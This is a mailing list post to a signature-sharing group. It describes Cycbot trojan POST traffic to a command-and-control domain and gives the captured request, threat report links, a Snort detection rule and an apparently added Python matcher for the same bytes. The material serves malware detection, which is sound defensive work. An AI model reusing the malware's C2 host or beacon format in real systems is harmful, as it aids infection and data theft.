[Emerging-Sigs] Cycbot POST

Packet Hack pckthck at gmail.com
Mon Oct 24 17:23:40 EDT 2011


Seeing this:

  POST /gate.php HTTP/1.1
  Host: ourdatatransfers.com
  Content-Length: 190
  Connection: close
  Content-Type: application/octet-stream
  Content-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

  FILE0^@D0<A8>qщSP

Similar traffic here:

  http://www.threatexpert.com/report.aspx?md5=1f04bd1b4eceb42e6d5859b6330fc7d7
  http://www.threatexpert.com/report.aspx?md5=9bbb79f6f11aa292af303e7636c5b6fa

Sophos associates the above domain in the Host: header with
Cycbot:

  http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cycbot-O/detailed-analysis.aspx

# Snort rule: POST method plus the leading client-body bytes captured above (multi-line with \ continuation)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Cycbot POST"; \
  flow:established,to_server; content:"POST"; http_method; \
  content:"FILE0|00 44 30 A8 71 D1 89 53 50|"; http_client_body; \
  reference:url,www.threatexpert.com/report.aspx?md5=1f04bd1b4eceb42e6d5859b6330fc7d7; \
  reference:url,www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cycbot-O/detailed-analysis.aspx; \
  sid:9100560; rev:1;)

-- pckthck
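For readers checking what the rule above actually tests, here is an added Python example (not from the post or the ET ruleset) that reconstructs the captured request and applies the same POST-method-plus-client-body-bytes check; the sample request and its zero padding are constructed, only the header values and marker bytes come from the post.

```python
# Byte pattern from the rule's http_client_body match: "FILE0|00 44 30 A8 71 D1 89 53 50|"
CYCBOT_MARKER = b"FILE0\x00\x44\x30\xa8\x71\xd1\x89\x53\x50"

# Constructed sample request based on the capture in the post; the body is the marker
# followed by zero padding so that it matches the Content-Length of 190.
SAMPLE_REQUEST = (
    b"POST /gate.php HTTP/1.1\r\n"
    b"Host: ourdatatransfers.com\r\n"
    b"Content-Length: 190\r\n"
    b"Connection: close\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    b"\r\n"
    + CYCBOT_MARKER + b"\x00" * (190 - len(CYCBOT_MARKER))
)


def split_request(raw: bytes):
    """Return (method, headers, body) for a raw HTTP/1.x request, or None if malformed."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    request_line = lines[0].split(b" ")
    if len(request_line) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return request_line[0], headers, body


def matches_cycbot_post(raw: bytes) -> bool:
    """Mirror the rule: method must be POST (http_method) and the marker must appear
    in the client body (http_client_body), not in the request line or headers."""
    parsed = split_request(raw)
    if parsed is None:
        return False
    method, headers, body = parsed
    if method != b"POST":
        return False
    # Limit the scan to the declared body so pipelined data is not treated as body.
    try:
        length = int(headers.get(b"content-length", b""))
    except ValueError:
        length = len(body)
    return CYCBOT_MARKER in body[:length]
```

Like the rule, the check matches the marker anywhere in the body, although the capture shows it at offset 0.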
